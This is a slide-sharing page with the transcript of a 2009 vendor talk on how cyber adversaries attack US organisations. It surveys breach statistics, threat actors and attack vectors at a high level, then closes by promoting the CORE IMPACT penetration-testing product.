Presentation is loading. Please wait.

Presentation is loading. Please wait.

How Cyber Adversaries Exploit the USA

Published byPiers Evans Modified over 6 years ago

Similar presentations

Presentation on theme: "How Cyber Adversaries Exploit the USA"— Presentation transcript:

1 How Cyber Adversaries Exploit the USA
January 24, 2009 All Roads Lead to Rome: How Cyber Adversaries Exploit the USA Tom Kellermann, CISM / VP of Security Awareness

2 History Repeats Itself
Hannibal using the Roman Roads to cross the Alps 40% Increase in Major Intrusions (US-CERT 2008)

3 Evolution of Threats Timeline

4 Key Trends The 2008 Cisco Annual Security Report found that the overall number of disclosed vulnerabilities grew by 11.5% over Vulnerabilities in virtualization technology nearly tripled - from 35 to 103 year-over-year - and attacks are becoming increasingly blended, cross-vector and targeted, according to the report. Cisco says its researchers saw 90% growth in threats originating from legitimate domains, nearly double what was seen in 2007. This year, numerous legitimate websites were infected with IFrames, malicious code injected by botnets that redirects visitors to malware-downloading sites, the company says.

5 2008 Intelligence Community Statistics
55% Increase in Remote Access Cyber Intrusions 52% Increase in Insider Cyber Intrusions 22% Increase in Credit Card Fraud

6 2008 Verizon Data Breach Report
Analysis of over 500 e-forensics audits: 73% resulted from external sources 18% by insiders 39% implicated business partners

7 Blackhats: Threat Actors
Nation States 108 countries with dedicated cyber-attack organizations Dragon Bytes: Chinese Information War Theory & Practice Terrorists Growing sophistication Hamas and Al Qaeda Ibrahim Samudra and Irhabi 007 Organized Crime Cybercrime is big business aka RBN FBI: #1 criminal priority is cybercrime

8 Modern Maginot Lines Early 1990s: Virus scanners Mid 1990s: Firewalls
Late 1990s: Over-reliance on encryption (PKI) Early 2000s: Over-reliance on IDS Late 2000s: Over-reliance on intrusion prevention systems / artificial intelligence As Business Transactions are pushed outside traditional enterprise boundaries, critical data is exposed. Existing perimeter based security tools cannot handle the threats of today’s pervasive computing environment. Virus scanner only pick up 35% of know viruses and worms. Tools like Golden Hacker Defender are for sale for less than $100 which mask code so it can circumvent signature based detection on all commercial AV scanners PKI private keys are stolen at whim from C drives by hackers who then use the encryption as a secret tunnel by which to bypass forensics tools.

9 Primary Attack Vectors
Digital insider attacks previously compromised systems Client-side applications (applications running on desktop / end-user systems, including readers, web browsers, media players, instant messengers, productivity tools such as MS Office, etc.) Operating systems Web applications Wireless networks

10

11 2008 Trends in Attacks Against .GOV
SQL Injection and Cross-site Scripting Island Hopping-Unisys/DHS Remote User Compromise-VPN Attacks-Client Side Attacks PKI Compromise--Private Key Theft Zero-Day Attacks Automated Attack Tools Digital Insider Attacks

12 Hosting Companies = Watering Holes
The significant dependence by corporate america upon the Internet infrastructure may make it susceptible to cascading risks. Convergence of services and interoperability between different network types (including cellular, public switched telephone networks or PSTN, Internet protocol or IP networks) make up a globally shared communications line. Unlike legacy systems in which mainframes operated within closed local area networks, the new environment is an open data transmission systems consisting of a number of gateways. The result is that while this facilitates global connections and cross-border sharing of information and services, it also acts as a double-edged sword since interoperability and global connectivity also facilitate the transmission of risks.

13 Why Testing is Important
Hackers attack data where it sits 99.9% of the time: clients, servers and databases Of all the vulnerabilities disclosed in 2007, only 50 percent can be corrected through vendor patches. (ISS) Nearly 90 percent of 2007 vulnerabilities could be remotely exploited, up one percentage point from (ISS)

14 Real-World Attack Behavior
Cybercriminals are still finding their way around, and through, point security defenses. Application Layer New attack paths App Defense A App Defense B App Defense C Spreadsheet Browser Host / OS Layer Point defense weaknesses Host Host defense A Defense B Host Defense C SEIM Credit Card #s Customer Data Employee Records Multistaged threats that move across systems and IT layers to threaten critical backend assets Network Layer Network Defense A Network Defense B Network Defense C Wireless Networking Devices Storage Networking Devices How do you know what’s working, what’s not, and what to do about it?

15 Evaluate the Effectiveness of Security Point Solutions
Application Defenses DLP, WAF, Encryption, SDLC Mgmt, Monitoring, Correlation SEIM Endpoint AV, Patch, SW FW, HIPS, NAC Host Defenses AV, Sec Config, Patch, HIPS Network Defenses – UTM FW, IPS, IDS, AV GW, etc. Defend & Monitor Test defenses against: 800+ exploits 5,000+ total attack vectors dynamic XSS, SQL Injection, and RFI exploits Automated Rapid Penetration Tests … + One-Step network, endpoint and vuln validation tests + Ability to manually run all modules and add custom exploits Test Actionable Data: Executive Summaries Detailed Findings + Links to Fixes Audit Trails for Compliance Delta Reports Show Vuln. Mgt. Progress Report

16 CORE IMPACT Pro: Network Security Testing
External (or Internal) Penetration Testing

17 CORE IMPACT Pro: Web App Security Testing
Internal Network Servers Internal Workstations User leverages compromised server to “pivot” the test to internal network systems. Web Application Server SQL Database

18 Comprehensive, Real-World Security Testing
By identifying and validating the most critical, exploitable risks, IMPACT enables intelligent vulnerability remediation and helps to prioritize security initiatives. App Defense A App Defense B App Defense C Spreadsheet Browser Host defense A Host Defense B Host Defense C SEIM Credit Card #s Customer Data Employee Records Network Defense A Network Defense B Network Defense C Wireless Networking Devices Storage Networking Devices Operational Security CISO

19 Core Impact Awards “Core’s smart dashboard, friendly UI, attack configuration wizards, and focused reports make penetration testing easier than ever ...” - InfoWorld, January 2008 Security Software Product of the Year - TechWorld, June 2007 “We have used IMPACT in SC Labs for two years and have found nothing else that even comes close” - SC Magazine, December 2007 "After using IMPACT it seems obvious to us that manual penetration is obsolete." - Federal Computing Week, May 2006 CORE IMPACT is an amazing tool to validate your security posture. - Information Security Magazine Wall Street Journal Technology and Innovation Award: Runner-Up, IT Security and Privacy – September 2006 “CORE IMPACT was a blast to test and a product I am certain would benefit organizations that choose to engage it.” - ISSA, May 4, 2007 eWeek Excellence Awards: Vulnerability Assessment and Remediation – May 2006

Download ppt "How Cyber Adversaries Exploit the USA"

Similar presentations

The Threat Within September 2004. Copyright © 2004 Q1 Labs. All Rights Reserved Agenda Customer Pain Industry Solutions Network Behavior Enforcement Example.

The Threat Within September Copyright © 2004 Q1 Labs. All Rights Reserved Agenda Customer Pain Industry Solutions Network Behavior Enforcement Example.
Current Security Threats WMO CBS ET-CTS Toulouse, France 26-30 May 2008 Allan Darling, NOAA’s National Weather Service WMO CBS ET-CTS Toulouse, France.

Current Security Threats WMO CBS ET-CTS Toulouse, France May 2008 Allan Darling, NOAA’s National Weather Service WMO CBS ET-CTS Toulouse, France.
Preventing Good People From Doing Bad Things Best Practices for Cloud Security Brian Anderson Chief Marketing Officer & Author of “Preventing Good People.

Preventing Good People From Doing Bad Things Best Practices for Cloud Security Brian Anderson Chief Marketing Officer & Author of “Preventing Good People.
1 Telstra in Confidence Managing Security for our Mobile Technology.

1 Telstra in Confidence Managing Security for our Mobile Technology.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.

8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
Know the Client Own the Problem Share the Solution The 2005 Case for Information Technology Security October 14, 2004.

Know the Client Own the Problem Share the Solution The 2005 Case for Information Technology Security October 14, 2004.
Global Information Security Issues According to the E&Y Global Survey, Managers Say the Right Thing… –90% of 1400 companies surveyed in 66 countries say.

Global Information Security Issues According to the E&Y Global Survey, Managers Say the Right Thing… –90% of 1400 companies surveyed in 66 countries say.
Nate Olson-Daniel Director of Strategic Development & Principal Engineer The Inevitable Attack.

Nate Olson-Daniel Director of Strategic Development & Principal Engineer The Inevitable Attack.
CYBER CRIME AND SECURITY TRENDS

CYBER CRIME AND SECURITY TRENDS
SiteLock Internet Security: Big Threats for Small Business.

SiteLock Internet Security: Big Threats for Small Business.
CISCO CONFIDENTIAL – DO NOT DUPLICATE OR COPY Protecting the Business Network and Resources with CiscoWorks VMS Security Management Software Girish Patel,

CISCO CONFIDENTIAL – DO NOT DUPLICATE OR COPY Protecting the Business Network and Resources with CiscoWorks VMS Security Management Software Girish Patel,
Security Risk Management Marcus Murray, CISSP, MVP (Security) Senior Security Advisor, Truesec

Security Risk Management Marcus Murray, CISSP, MVP (Security) Senior Security Advisor, Truesec
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
1Cisco Security NOW © 2003, Cisco Systems, Inc. All rights reserved. THIS IS THE POWER OF CISCO SECURITY. now.

1Cisco Security NOW © 2003, Cisco Systems, Inc. All rights reserved. THIS IS THE POWER OF CISCO SECURITY. now.
Securing Information Systems

Securing Information Systems
Network Security Overview Ali Shayan 2008.08.06. Network Security Management’s Perspective Dangers: – Negligence – Dereliction of duty – Liable for damaged.

Network Security Overview Ali Shayan Network Security Management’s Perspective Dangers: – Negligence – Dereliction of duty – Liable for damaged.
Www.softwareassist.net Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.

Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.
Enterprise Computing Community June 13 - 15, 2010February 27, 2010 1 Information Security Industry View Linda Betz IBM Director IT Policy and Information.

Enterprise Computing Community June , 2010February 27, Information Security Industry View Linda Betz IBM Director IT Policy and Information.
Did You Hear That Alarm? The impacts of hitting the information security snooze button.

Did You Hear That Alarm? The impacts of hitting the information security snooze button.
Business Computing 550 Lesson 6. 2 Security Threats on Web Sites Issues and vulnerabilities 1.Illegal Access and Use (Hacking the system or users exposing.

Business Computing 550 Lesson 6. 2 Security Threats on Web Sites Issues and vulnerabilities 1.Illegal Access and Use (Hacking the system or users exposing.

Similar presentations

Ads by Google